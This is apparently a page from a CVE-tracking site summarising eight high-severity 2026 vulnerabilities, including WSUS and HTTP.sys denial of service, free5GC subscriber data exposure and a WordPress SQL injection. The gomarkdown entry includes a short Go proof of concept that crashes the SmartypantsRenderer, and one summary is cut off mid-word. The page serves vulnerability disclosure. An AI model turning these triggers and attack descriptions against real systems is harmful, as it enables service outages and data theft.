Security feature bypass in Adobe ColdFusion 2023.18, 2025.6, and earlier allows remote unauthenticated attackers to circumvent security controls via improper input validation, potentially enabling unauthorized access to protected resources. The vulnerability carries a CVSS score of 7.5 with high integrity impact, though exploitation reportedly requires user interaction per the description. No public exploit code or active exploitation confirmed at time of analysis, but the authentication bypass classification indicates potential for privilege escalation or access control circumvention.

Authentication Bypass Coldfusion
NVD
CVSS 3.1
7.5
EPSS
0.2%
CVE-2026-26154 HIGH PATCH Exploit Unlikely This Week

Windows Server Update Service (WSUS) fails to properly validate network inputs, allowing unauthenticated remote attackers to cause denial of service across all Windows Server versions from 2012 through 2025. The vulnerability (CVSS 7.5) enables network-based tampering with high availability impact (AV:N/AC:L/PR:N/UI:N/A:H), though confidentiality and integrity remain unaffected. Patch available per vendor advisory; no public exploit identified at time of analysis. The Authentication Bypass tag and PR:N vector confirm attackers require no credentials, making internet-exposed WSUS servers particularly vulnerable.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
7.5
EPSS
0.2%
CVE-2026-32071 HIGH PATCH Exploit Unlikely This Week

Remote denial-of-service in Windows Local Security Authority Subsystem Service (LSASS) allows unauthenticated network attackers to crash Windows systems through null pointer dereference exploitation. Affects Windows 10 (versions 1607-22H2), Windows 11 (22H3-26H1), and Windows Server (2016-2025) across multiple release channels. Microsoft has released patches for all affected versions. No public exploit identified at time of analysis, but the low attack complexity (AC:L) and unauthenticated netwo

Denial Of Service Null Pointer Dereference Microsoft
NVD VulDB
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-40245 HIGH GHSA This Week

Unauthenticated access to free5GC UDR subscriber identifiers exposes SUPI/IMSI values via unprotected 5G Service Based Interface endpoint. Missing return statements in free5GC UDR versions prior to 4.2.1 allow attackers to retrieve complete subscriber databases with a single parameterless HTTP GET request, undermining 3GPP SUCI privacy mechanisms. Public exploit code exists. EPSS score is low (0.10%) indicating limited observed exploitation, but impact is severe for exposed deployments with misconfigured network segmentation.

Information Disclosure Deserialization
NVD GitHub
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-33096 HIGH PATCH Exploit Unlikely This Week

Denial of service in Windows HTTP.sys kernel-mode driver allows unauthenticated remote attackers to crash affected systems via malformed HTTP requests. Affects all currently supported Windows 11 versions (22H2 through 26H1) and Windows Server 2022/2025 editions. The vulnerability stems from an out-of-bounds read (CWE-125) triggered when HTTP.sys processes specially crafted network packets without authentication (CVSS AV:N/PR:N). Vendor-released patches available for all affected versions with specific build numbers identified. No public exploit identified at time of analysis, though low attack complexity (AC:L) suggests straightforward exploitation once technical details emerge.

Buffer Overflow Information Disclosure Microsoft
NVD VulDB
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-4352 HIGH This Week

SQL injection in JetEngine WordPress plugin (≤3.8.6.1) via Custom Content Type REST API allows unauthenticated remote attackers to extract sensitive database information. The vulnerability stems from unsanitized search parameters in REST endpoints, bypassing WordPress's built-in SQL protections. Attack complexity is low (CVSS AC:L) with no user interaction required. EPSS and KEV data not provided; exploitation requires Custom Content Types module enabled with public REST endpoints configured.

WordPress SQLi
NVD
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-23708 HIGH This Week

Authentication bypass in Fortinet FortiSOAR allows unauthenticated remote attackers to circumvent two-factor authentication (2FA) protections via replay attacks against intercepted authentication tokens. Affects both PaaS and on-premise deployments of FortiSOAR versions 7.5.0-7.5.2 and 7.6.0-7.6.3. Successful exploitation requires network positioning to intercept and decrypt authentication traffic, then replay captured 2FA requests before token expiration (CVSS:3.1/AV:N/AC:H/PR:N/UI:R). EPSS data not available; no public exploit code or CISA KEV listing identified at time of analysis, though the precise attack requirements (traffic interception, decryption, timing) increase complexity beyond simple network access.

Fortinet Authentication Bypass
NVD
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-40890 HIGH PATCH GHSA This Week

### Summary Processing a malformed input containing a `<` character that is not followed by a `>` character anywhere in the remaining text with a SmartypantsRenderer will lead to Out of Bounds read or a panic. ### Details The `smartLeftAngle()` function in `html/smartypants.go:367-376` performs an out-of-bounds slice operation when processing a `<` character that is not followed by a `>` character anywhere in the remaining text. https://github.com/gomarkdown/markdown/blob/37c66b85d6ab025ba67a73ba03b7f3ef55859cca/html/smartypants.go#L367-L376 If the length of the slice is lower than its capacity, this leads to an extra byte of data read. If the length equals the capacity, this leads to a panic. ### PoC ```golang package main import ( "bytes" "fmt" "github.com/gomarkdown/markdown/html" ) func main() { src := []byte("<a") fmt.Printf("Input: %q (len=%d, cap=%d)\n", src, len(src), cap(src)) var buf bytes.Buffer sp := html.NewSmartypantsRenderer(html.Smartypants) sp.Process(&buf, src) // panics: slice bounds out of range fmt.Printf("Output: %q\n", buf.String()) } ``` ### Impact This vulnerability will lead to a Denial of Service / panic on the processing service. -- The Datadog Security Team

Denial Of Service Information Disclosure Buffer Overflow Red Hat
NVD GitHub HeroDevs
CVSS 3.1
7.5
EPSS
0.0%
Prev Page 4 of 9 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy